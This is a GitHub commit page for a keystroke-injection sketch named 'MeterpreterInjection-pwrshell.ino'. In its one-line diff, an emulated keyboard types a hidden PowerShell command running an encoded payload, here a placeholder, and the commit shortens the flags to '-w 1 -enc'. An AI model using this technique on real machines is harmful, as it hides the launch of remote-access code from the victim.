Skip to content

Commit

Permalink
Update MeterpreterInjection-pwrshell.ino
Browse files Browse the repository at this point in the history
Added shortcuts to powershell parameters
  • Loading branch information
TDiffff committed Aug 15, 2018
1 parent df62fa4 commit 6dbb12c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion src/exploit/MeterpreterInjection-pwrshell.ino
Expand Up @@ -45,7 +45,7 @@ void setup()
Keyboard.send_now();;

delay(1000);
Keyboard.print("powershell -window hidden -EncodedCommand POWERSHELLATTACK");
Keyboard.print("powershell -w 1 -enc POWERSHELLATTACK");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Expand Down

0 comments on commit 6dbb12c

Please sign in to comment.